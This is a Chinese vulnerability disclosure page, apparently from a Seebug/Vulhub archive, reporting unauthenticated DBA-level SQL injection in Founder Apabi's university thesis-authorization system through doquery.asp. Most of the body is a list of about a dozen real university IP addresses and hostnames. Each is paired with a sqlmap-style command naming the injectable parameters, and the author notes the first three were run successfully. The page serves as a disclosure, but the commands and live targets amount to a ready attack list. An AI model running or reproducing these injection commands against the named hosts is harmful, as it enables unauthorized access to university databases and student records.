|某高校在用系统sql注入（打包）（DBA）（无需登录）2

某高校在用系统sql注入（打包）（DBA）（无需登录）2

- AV AC AU C I A

发布： 2025-04-13

修订： 2025-04-13

### 简要描述： 1 ### 详细说明：案例较多，给CNCERT ### 漏洞证明： Apabi论文授权提交系统版权所有© 北京方正阿帕比技术有限公司谷歌搜索：论文授权提交系统北京大学复旦大学什么的都在其中~ [<img src="https://images.seebug.org/upload/201503/1319542601266952db5b97edd2cbc24a55f85c52.png" alt="060814241c327099951e4c60760c02105295ae87.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201503/1319542601266952db5b97edd2cbc24a55f85c52.png) 漏洞文件doquery.asp 漏洞参数：txtStuName,txtStuNo,cboCollege,cboSubjectClass,txtMajor,inputStartDate,inputEndDate 随便来几个案例 210.44.126.14/tasi/admin/query/doquery.asp --data "txtStuName=w&txtStuNo=w&cboCollege=&cboDegreeType=0&cboSubjectClass=&cboSubject=&txtMajor=&inputStartDate=&inputEndDate=&check=-1&catalog=-1&authorize=-1&convert=-1&publish=-1&public=-1" -p "txtStuName,txtStuNo,cboCollege,cboSubjectClass,txtMajor,inputStartDate,inputEndDate" 202.195.243.37/tasi/admin/query/doquery.asp --data "txtStuName=w&txtStuNo=w&cboCollege=&cboDegreeType=0&cboSubjectClass=&cboSubject=&txtMajor=&inputStartDate=&inputEndDate=&check=-1&catalog=-1&authorize=-1&convert=-1&publish=-1&public=-1" -p "txtStuName,txtStuNo,cboCollege,cboSubjectClass,txtMajor,inputStartDate,inputEndDate" 202.120.121.200/tasi/admin/query/doquery.asp --data "txtStuName=w&txtStuNo=w&cboCollege=&cboDegreeType=0&cboSubjectClass=&cboSubject=&txtMajor=&inputStartDate=&inputEndDate=&check=-1&catalog=-1&authorize=-1&convert=-1&publish=-1&public=-1" -p "txtStuName,txtStuNo,cboCollege,cboSubjectClass,txtMajor,inputStartDate,inputEndDate" pss.uestc.edu.cn/tasi/admin/query/doquery.asp --data "txtStuName=w&txtStuNo=w&cboCollege=&cboDegreeType=0&cboSubjectClass=&cboSubject=&txtMajor=&inputStartDate=&inputEndDate=&check=-1&catalog=-1&authorize=-1&convert=-1&publish=-1&public=-1" -p "txtStuName,txtStuNo,cboCollege,cboSubjectClass,txtMajor,inputStartDate,inputEndDate" 202.203.222.222/tasi/admin/query/doquery.asp --data "txtStuName=w&txtStuNo=w&cboCollege=&cboDegreeType=0&cboSubjectClass=&cboSubject=&txtMajor=&inputStartDate=&inputEndDate=&check=-1&catalog=-1&authorize=-1&convert=-1&publish=-1&public=-1" -p "txtStuName,txtStuNo,cboCollege,cboSubjectClass,txtMajor,inputStartDate,inputEndDate" 218.242.146.229/tasi/admin/query/doquery.asp --data "txtStuName=w&txtStuNo=w&cboCollege=&cboDegreeType=0&cboSubjectClass=&cboSubject=&txtMajor=&inputStartDate=&inputEndDate=&check=-1&catalog=-1&authorize=-1&convert=-1&publish=-1&public=-1" -p "txtStuName,txtStuNo,cboCollege,cboSubjectClass,txtMajor,inputStartDate,inputEndDate" 202.193.70.164/TASi/admin/query/doquery.asp --data "txtStuName=w&txtStuNo=w&cboCollege=&cboDegreeType=0&cboSubjectClass=&cboSubject=&txtMajor=&inputStartDate=&inputEndDate=&check=-1&catalog=-1&authorize=-1&convert=-1&publish=-1&public=-1" -p "txtStuName,txtStuNo,cboCollege,cboSubjectClass,txtMajor,inputStartDate,inputEndDate" 202.120.227.60/tasi/admin/query/doquery.asp --data "txtStuName=w&txtStuNo=w&cboCollege=&cboDegreeType=0&cboSubjectClass=&cboSubject=&txtMajor=&inputStartDate=&inputEndDate=&check=-1&catalog=-1&authorize=-1&convert=-1&publish=-1&public=-1" -p "txtStuName,txtStuNo,cboCollege,cboSubjectClass,txtMajor,inputStartDate,inputEndDate" 59.72.151.17:8000/admin/query/doquery.asp --data "txtStuName=w&txtStuNo=w&cboCollege=&cboDegreeType=0&cboSubjectClass=&cboSubject=&txtMajor=&inputStartDate=&inputEndDate=&check=-1&catalog=-1&authorize=-1&convert=-1&publish=-1&public=-1" -p "txtStuName,txtStuNo,cboCollege,cboSubjectClass,txtMajor,inputStartDate,inputEndDate" 202.197.127.125/tasi/admin/query/doquery.asp --data "txtStuName=w&txtStuNo=w&cboCollege=&cboDegreeType=0&cboSubjectClass=&cboSubject=&txtMajor=&inputStartDate=&inputEndDate=&check=-1&catalog=-1&authorize=-1&convert=-1&publish=-1&public=-1" -p "txtStuName,txtStuNo,cboCollege,cboSubjectClass,txtMajor,inputStartDate,inputEndDate" 218.199.187.117:8080/admin/query/doquery.asp --data "txtStuName=w&txtStuNo=w&cboCollege=&cboDegreeType=0&cboSubjectClass=&cboSubject=&txtMajor=&inputStartDate=&inputEndDate=&check=-1&catalog=-1&authorize=-1&convert=-1&publish=-1&public=-1" -p "txtStuName,txtStuNo,cboCollege,cboSubjectClass,txtMajor,inputStartDate,inputEndDate" 202.119.83.2/apatasi30/admin/query/doquery.asp --data "txtStuName=w&txtStuNo=w&cboCollege=&cboDegreeType=0&cboSubjectClass=&cboSubject=&txtMajor=&inputStartDate=&inputEndDate=&check=-1&catalog=-1&authorize=-1&convert=-1&publish=-1&public=-1" -p "txtStuName,txtStuNo,cboCollege,cboSubjectClass,txtMajor,inputStartDate,inputEndDate" 218.242.146.229/tasi/admin/query/doquery.asp --data "txtStuName=w&txtStuNo=w&cboCollege=&cboDegreeType=0&cboSubjectClass=&cboSubject=&txtMajor=&inputStartDate=&inputEndDate=&check=-1&catalog=-1&authorize=-1&convert=-1&publish=-1&public=-1" -p "txtStuName,txtStuNo,cboCollege,cboSubjectClass,txtMajor,inputStartDate,inputEndDate" 前三个跑的结果 [<img src="https://images.seebug.org/upload/201503/131957209d6bcc4612879ef6620b74734c1965bb.png" alt="屏幕截图(984)1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201503/131957209d6bcc4612879ef6620b74734c1965bb.png) [<img src="https://images.seebug.org/upload/201503/131957309b97d02b1e88dd59d2cd267eaa263236.png" alt="屏幕截图(985).png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201503/131957309b97d02b1e88dd59d2cd267eaa263236.png) [<img src="https://images.seebug.org/upload/201503/1319573789547f1a22f7b50914923ac8e3cb3c2e.png" alt="屏幕截图(986).png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201503/1319573789547f1a22f7b50914923ac8e3cb3c2e.png) [<img src="https://images.seebug.org/upload/201503/13195744f36f2eefd1c53c62c97f8ac7e8a29c0f.png" alt="屏幕截图(987).png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201503/13195744f36f2eefd1c53c62c97f8ac7e8a29c0f.png) [<img src="https://images.seebug.org/upload/201503/13195752f15cefbfd6abf0a84eaa4225d747d2e8.png" alt="屏幕截图(988).png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201503/13195752f15cefbfd6abf0a84eaa4225d747d2e8.png) [<img src="https://images.seebug.org/upload/201503/13195759429afc454a4007c1f5283071cd198265.png" alt="屏幕截图(989).png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201503/13195759429afc454a4007c1f5283071cd198265.png)

漏洞利用/PoC

暂无可用Exp或PoC

受影响的平台与产品

当前有0条受影响产品信息

您还没有登录，登录后可查看更多

添加资源
收藏资源
问题反馈

贡献用户

暂无贡献用户

VULHUB ™